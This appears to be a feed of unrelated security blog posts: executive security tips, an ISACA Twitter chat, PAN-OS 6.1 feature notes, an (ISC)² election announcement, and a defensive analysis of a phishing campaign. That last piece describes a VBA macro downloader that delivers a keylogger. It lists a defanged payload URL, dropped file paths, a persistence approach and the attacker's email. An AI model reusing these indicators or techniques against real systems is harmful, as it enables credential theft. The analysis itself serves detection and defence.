To celebrate the 11th annual National Cyber Security Awareness Month (NCSAM), (ISC)² has released its fourth set of tips by security experts: cybersecurity tips for Chief Executive Officers (CEOs).
“Two-factor authentication (something you have, know, or are) has become very important for system access. Passwords alone just do not cut it anymore. This is extremely important as we see the rapid rise in financial transactions, particularly on mobile devices. Ask your bank if two-factor authentication is available and if not, get another bank that does. Credit card companies and online retailers are close behind. They are not going to cover your losses through stolen identity and fraud much longer. It’s your money and reputation, so do your part to protect yourself.
If you are a service provider and do not have two-factor as mandatory or as an option, you should explore how quickly you could provide it. It is becoming a business discriminator.” -W. Hord Tipton, CISSP-ISSEP, CAP, Executive Director, (ISC)2
“Make sure you have an incident response plan in place for when you get breached. Document, disseminate, and practice that plan with stakeholders from each and every segment of your business.
Also, know the current level and business impact of risk to your company. Have a plan to periodically report on/communicate identified risk with the executive leadership and how it will be addressed.” -Dan Waddell, CISSP, CAP, Director of Government Affairs,(ISC)2
Last week, ISACA hosted a Twitter chat focusing on cybersecurity challenges and opportunities in support of Cybersecurity Month. ISACA’s International President Robert E. Stroud and International Vice President Ramsés Gallego participated as our guest panel. Review excerpts from the chat below:
ISACANews
Q1: What are the top #cybersecurity threats facing organizations today? #cybersecuritychat
RobertEStroud
A1: there are so many …. access to information, service disruption, theft….. #cybersecuritychat
ramsesgallego
A1: Understanding the risks. the human factor. PEOPLE using technologies. #cybersecuritychat #CyberSecMonth #ISACA
RobertEStroud
A1: Interesting change is the threat is external, not just internal… #cybersecuritychat
ISACANews
Q2: What #cybersecurity priorities should organizations focus on going into 2015? #cybersecuritychat
ramsesgallego
A2: Protecting the brand, saving IP, defending people. Both in digital & physical world. #cybersecuritychat #CyberSecMonth #ISACA
RobertEStroud
A2: People – getting their skills up to date to deal with the changing landscape. #cybersecuritychat #ISACA
ramsesgallego
A2: Communicate, communicate, communicate. Let people know the impact of misbehaving. #cybersecuritychat #CyberSecMonth #ISACA
RobertEStroud
A2: Skills need to include security implications of emerging technologies #cybersecuritychat #isaca
ramsesgallego
A2: Gettin’ the two most important assets at the core of protection: people and data. #cybersecuritychat #CyberSecMonth #ISACA
RobertEStroud
A2: Skills need to include security implications of emerging technologies #cybersecuritychat #isaca
ISACANews
Q3: Where does #cybersecurity strategy fit within an organization? #cybersecuritychat
RobertEStroud
A3: Basic skills and awareness across the organization #cybersecuritychat
ramsesgallego
A3: Cybersecurity is for Governments, private companies, Healthcare, Education,… For us as a society. #cybersecuritychat #CyberSecMonth #ISACA
ramsesgallego
A3: @bwhort01 says ‘Everywhere. For everyone.’. Strategy implies us all. #cybersecuritychat #CyberSecMonth #ISACA
ramsesgallego
A3: Enterprise Strategy is AT THE TOP. From there, tactics. Cybersecurity is no different. #cybersecuritychat #CyberSecMonth #ISACA
RobertEStroud
A3: Boards are starting to talk about #cybersecurity #cybersecuritychat #isaca
The much anticipated PAN-OS 6.1 is finally here and with it, many new topics to read that describe new features and functionality. Here are some recommendations, hand-picked by the Technical Publications team, to add to your reading list.
New Feature Documentation
Local Signature Generation Support for WF-500 Appliances
The WF-500 appliance can now generate signatures locally, eliminating the need to send any data to the public cloud in order to block malicious content. For more information, seeSignature/URL Generation on a WF-500 Appliance.
Per App VPN for GlobalProtect
Leveraging the GlobalProtect Mobile Security Manager App Store feature introduced in GlobalProtect 6.1, the GlobalProtect app for iOS now supports Per App VPN. With Per App VPN, GlobalProtect can route all managed business apps through your corporate VPN, while allowing personal apps direct access to the Internet. For business apps with Per App VPN enabled, if the business app is unable to connect to the corporate VPN, the app will be unavailable to the user and will not send traffic until the secure connection is established. Users will still have access to their unmanaged apps, giving them the freedom to user their devices for personal use while protecting your critical business traffic. For more information, see Isolate Business Traffic.
Use Case: VM-Series Firewalls as GlobalProtect Gateways in AWS
If your users are more physically distributed than the supporting network infrastructure, GlobalProtect gateways in AWS remove the barriers to providing consistent security for all your users. The VM-Series firewall in AWS melds the security and IT logistics required to consistently and reliably protect devices used by mobile users in regions where you do not have a presence. By deploying the VM-Series firewall in the AWS cloud you can quickly and easily deploy GlobalProtect gateways around the world, and extend the corporate acceptable use policy to protect mobile users from threats and risky applications. For more information on how to deploy this solution, see Use Case: VM-Series Firewalls as Global Protect Gateways in AWS!
LACP Support
The firewall can now use Link Aggregation Control Protocol (LACP) to manage the interfaces in an aggregate group. Enabling LACP improves device and network availability by providing redundancy within aggregate groups and automating interface failure detection. For more information, see LACP.
Session End Reason Logging Support
Traffic logs now include a session end reason field to help troubleshoot connectivity and application availability issues in firewall traffic. For more information, see Session End Reason Logging.
New Documentation on Existing Features
In addition to new feature documentation, we’ve also expanded the depth of information about the following features.
Virtual Systems
Virtual systems are separate, logical firewall instances within a Palo Alto Networks firewall, which provide segmented administration and scalability of a firewall, along with reduced capital and operational expenses. For more information about benefits, use cases, and configuration of virtual systems, external zones, and shared gateways, see Virtual Systems.
Session Settings and Timeouts
This new topic describes settings and timers for TCP, UDP, and ICMPv6 sessions, in addition to IPv6, NAT64, jumbo frame size, MTU, accelerated aging, and captive portal authentication settings. For more information, see Session Settings and Timeouts.
DHCP
This new topic describes the Dynamic Host Configuration Protocol and how to configure interfaces on the firewall to act as a DHCP server, client, or relay agent. DHCP provides network addresses along with TCP/IP and link-layer configuration parameters to dynamically configured hosts. For more information, see DHCP.
NAT
This new topic describes source and destination Network Address Translation, NAT rule capacities, and the ability to configure Dynamic IP and Port NAT oversubscription. For more information, see NAT.
A Message from the Board Communications Committee on Board Elections
This year the (ISC)² Board of Directors election process emerges after a massive year-long facelift. Through the recommendations of last year’s Board of Directors and the tenacity of the (ISC)² Management team, this year marks an unprecedented shift as the organization adjusts election processes based on member feedback.
We really try to be problem-solvers, and with our emphasis on member service, making sure we aligned the election process to meet the changing demands of our membership was paramount this year. You asked, we listened, and we have some exciting changes to share.
This year’s election runs from November 16-30, 2014 and our goal is to have the highest number of members voting in history. Here’s what we’re doing to make that happen.
New official candidate forum.
First, you’ll have the opportunity to interact one-on-one with all the candidates through an open forum online. Members are encouraged to interact, ask questions and really engage with the candidates through this self-moderated platform. The forum is hosted on LinkedIn as a public group. With 260 million users across more than 200 countries, LinkedIn was an obvious choice for a professional discussion forum. You can access the (ISC)² Board of Directors Election Candidates’ Forum through (ISC)² Election Centralor directly on LinkedIn. You told us seeing bios and profiles on a website didn’t provide enough background on the candidates, and we agree! This new forum offers the platform to dive in to tough issues and get more background on your Board of Directors candidates. You can subscribe to email digests for the group or specific discussions, and you can post directly on the group 24×7.
Election Central.
Second, you’ll have a central place to access all the relevant information for this year’s election. The team is pleased to present the first Election Central, a portal to access candidates’ bios, candidate social media links, details about the election process, and informative overviews of what it means to be a Board of Directors member at (ISC)². Instead of logging in and clicking through several pages and menus to find pieces of information, we’ve put it neatly in one central place for you. You can useElection Central as your primary resource throughout the election process.
New voting platform.
Third, the team has worked tirelessly to move voting to a hosted balloting system that provides end-to-end auditable voting. This change is no small task for an organization with 100,000 members! Although the integrity of the voting process in years past was extremely high, the Board of Directors and Management took the extra step to migrate to a fully hosted, auditable voting platform. Results will still be validated by a third party as they’ve been in the past. We believe this change adds an extra layer of security and transparency by distancing the organization from the ballots and adding yet another layer of validation. Not only is the platform hosted and secured, but it leverages single sign-on for a streamlined login and seamless experience for members.
You, the members.
Last, but most certainly not least, our secret weapon is you – the member. You have the power to transform the future and be an active participant in choosing your representation on the (ISC)² Board of Directors. We believe this year marks an unprecedented level of participation, care and attention to, from and by the members. It takes an active membership to make elections meaningful, and we hope you’ll find these new changes empower you to be an active participant this year.
Is our new system perfect? I’m sure it’s not. Theodore Roosevelt said, “In any moment of decision, the best thing you can do is the right thing. The worst thing you can do is nothing.” And so we are doing something, and we view this year as the first big step toward meeting member demand, increasing member engagement, and bridging the gap between you, the organization, and your Board of Directors. We hope you’ll take advantage of the new resources available to you during this year’s election and of course, we welcome feedback as we continue to learn and grow.
On behalf of the (ISC)² Board Communications Committee and your (ISC)² Board of Directors, we welcome you to the 2015 election and ask for your participation in helping us grow and transform the organization to meet the challenges of a new year!
Jennifer Minella, CISSP
Chair, Board Communications Committee
(ISC)² Board of Directors
While Microsoft documents that leverage malicious, embedded Visual Basic for Applications (VBA) macros are not a new thing, their use has noticeably increased this year, thanks in part to their simplicity and effectiveness.
Some threat actors commonly use this class of malware to drop a second stage payload on victim systems. Even though Microsoft attempts to mitigate this threat by disabling macros by default, the percentage of users who explicitly bypass this protection and enable macros remains high.
Exploiting the human factor, the most effective attacker strategy is the tried and true spear phishing attack, ideally made to look authentic by appearing to originate from a legitimate organization/individual and containing role-relevant or topic-of-interest content to entice its intended target. This post examines an information stealer campaign that leveraged a VBA macro script, focusing on its progression, from delivery to Command and Control (C2), and its attribution to a malicious actor for context on objectives and motivation.
Delivery and Exploitation
The recent campaign started with an email sent to an employee responsible for processing financial statements at a global financial organization (Figure 1). The sender’s email address was spoofed as originating from an energy company. Subsequent analysis would show that this façade was very thin; yet, it is often all that is required to encourage a user to open an attachment or click on a link that then executes malicious code.
Figure 1: Delivery of a phishing message containing malicious DOC file
The above e-mail employs common pressure tactics for phishing messages. Specifically, it touches on two areas of potential concern for a target: financial responsibility and the introduction of a state of uncertainty and confusion. In this case, the role of the target as a processor of financial statements might mean that the target is accustomed to receiving similarly structured legitimate e-mails; accordingly, they may open a malicious attachment without a second thought.
The second factor is much broader and relates to how humans deal with uncertainty. Without specific awareness and training, some users may be inclined to open the attachment, wondering why the e-mail was sent to them. In psychology, this is referred to as the “Need for Closure” personality trap.
The next layer of this attack is found within the malicious DOC file once a victim opens it. With a system properly configured to protect against automatic execution of VBA macros, no malicious code has been run at this point. Figure 2 presents a screenshot of the malicious attachment’s displayed contents.
Figure 2: Displayed contents of malicious DOC file, TTAdvise.doc
This content further compounds the two points of concern for the target, and now presents a convenient option of clicking on “Enable Content” to obtain closure on the matter. Despite a security warning (Figure 3), a number of users still choose to enable respective content, allowing for malicious VBA macros to run on their system.
Figure 3: Often ignored Microsoft security warning against enabling macro content
After enabling macros, none of the promised data is shown to the victim; however, the malicious VBA macro script executes in the background without the user’s knowledge.
VBA Macro Script
The embedded VBA macro script is shown in Figure 4.
Figure 4: Embedded VBA macro script
This script operates as a downloader, pulling a second stage payload from the following URL (Note: at the time of this post, the referenced domain was no longer active):
hxxp://icqap.com/oludouble.exe
Installation and Persistence
Static analysis of the “oludouble.exe” binary is summarized in Figure 5.
Figure 5: Static analysis of downloaded second stage malware, oludouble.exe
Once executed, “oludouble.exe” drops two executables (Windows XP paths furnished):
C:\Documents and Settings\Administrator\Desktop\exchangepre.exe
C:\Documents and Settings\Administrator\Application Data\Windows Update.exe
Both binaries are exact copies (Figure 6).
Figure 6: Files dropped from second stage malware, oludouble.exe
The second stage malware also copies itself to the following directory (Windows XP) and deletes its original file:
C:\Documents and Settings\Administrator\Application Data\Temp.exe
Persistence (enabling the malware to reload after reboot and restart) is achieved through addition of the following registry key, set to the path for the “Windows Update.exe” binary (Figure 7):
Figure 7: Windows registry modification for persistence
Malware Capabilities
API Calls extracted from “Windows Update.exe” (b6275be58a539ea9548d02ab6229c768) hints at associated capabilities (Figure 8).
Figure 8: API calls found in “Windows Update.exe” binary
Based on these API calls, the malware appears to support enumeration of a variety of system information. Additionally, the use of “GetAsyncKeyState”, which obtains key press status, could be indicative of keylogging capabilities.
Further investigation and research revealed that this malware leverages the Predator Pain keylogger, a favorite tool of this threat actor. Overall, this malware functions as an information stealer (Infostealer), including capture and exfiltration of the following types of information:
Website credentials
Financial information
Chat session contents
Email contents
Command and Control (C2)
Once installed, this malware determines its Internet-facing IP address and then establishes a connection with the following domains:
The first two domains are legitimate public IP verification services. The latter two are C2 servers run by the malicious actor, which use SMTP and FTP communications, respectively.
Attribution
E-mail headers are a valuable source of intelligence when investigating these types of attacks (Figure 9).
Figure 9: E-mail headers for phishing message
In this example, when the victim opened the phishing message, it appeared to originate from a legitimate organization. However, closer inspection revealed that the sender address was spoofed through the ‘X-Env-Sender’ header. In an attempt to slide past cursory examination, the malicious actor used an open mail relay, server[.]edm.sg. Another important e-mail header field for this message is ‘Reply-To’, which contains a valid e-mail for this malicious actor:
cimaskozy(at)yahoo.com
Setting the ‘Reply-To’ email header field to a valid address is another common threat actor tactic. It supports elicitation activities by that actor should a target respond to the message (i.e., further social engineering). Yet, this technique should also present a red flag to a user, as the initial façade of the originating e-mail address is removed at that point.
Research on the above email address reveals that this actor has been active in the cybercrime underground since at least 2010. Specifically, this actor goes by the handle “Skozzy” and is a known carder, seller of compromised credit card information, and facilitator of related services. Accordingly, we categorize “Skozzy” as primarily a cybercrime actor motivated by financial gain, although roles across nation state, cybercrime, hacktivist and ankle-biter/script kiddies are not mutually exclusive and – in fact – continue to become fuzzier over time.
Figure 10 is a screenshot of a YouTube post by “Skozzy” (skozzy11) from 2010.
Figure 10: YouTube post from “Skozzy”, 2010
Figure 11 is a screenshot from a Pastebin post, also from 2010.
Figure 11: Pastebin post from “Skozzy”, 2010
“Skozzy” is also active on HackForums[.]net and has shared thoughts and experiences related to keylogging tools like Limitless Logger and Predator Pain (Figure 12). Of particular note, the infostealer/keylogger tools that “Skozzy” prefers are able to steal much more than what has been observed so far for this actor.
Figure 12: Posts on HackForums[.]net regarding keyloggers
“Skozzy” also shares that Predator Pain is a preferred tool, as it offers great support (Figure 13).
Figure 13: “Skozzy” prefers the Predator Pain keylogger
Deeper analysis and correlation across domains and samples that we believe related to this threat actor will be covered in subsequent blog content.
Conclusion
This case epitomizes how easy it has become these days to steal sensitive information from victims who fall prey to such campaigns. Associated tools can be bought online for less than $100, which often also includes support packages that rival those of mainstream commercial software.
Stolen information can be used for more than standard credit card fraud. The crossover between malicious actor objectives may include opportunistic aspects of cyber espionage, extortion, identity theft, intellectual capital theft, and much more. It is also important to note that none of the major anti-virus (AV) vendors detected this threat at the time it was delivered. The natural gap between creation of these threats and a corresponding signature for their detection by traditional AV remains a sweet spot for successful malicious campaigns. Therefore, it is increasingly important to properly architect and deploy network and endpoint protections to ensure thorough and effective defense of computing and information assets.
The Palo Alto Networks Enterprise Security Platform is a prime example of technology meant to address and minimize the risk associated with emerging threats. Learn more about the platform here.
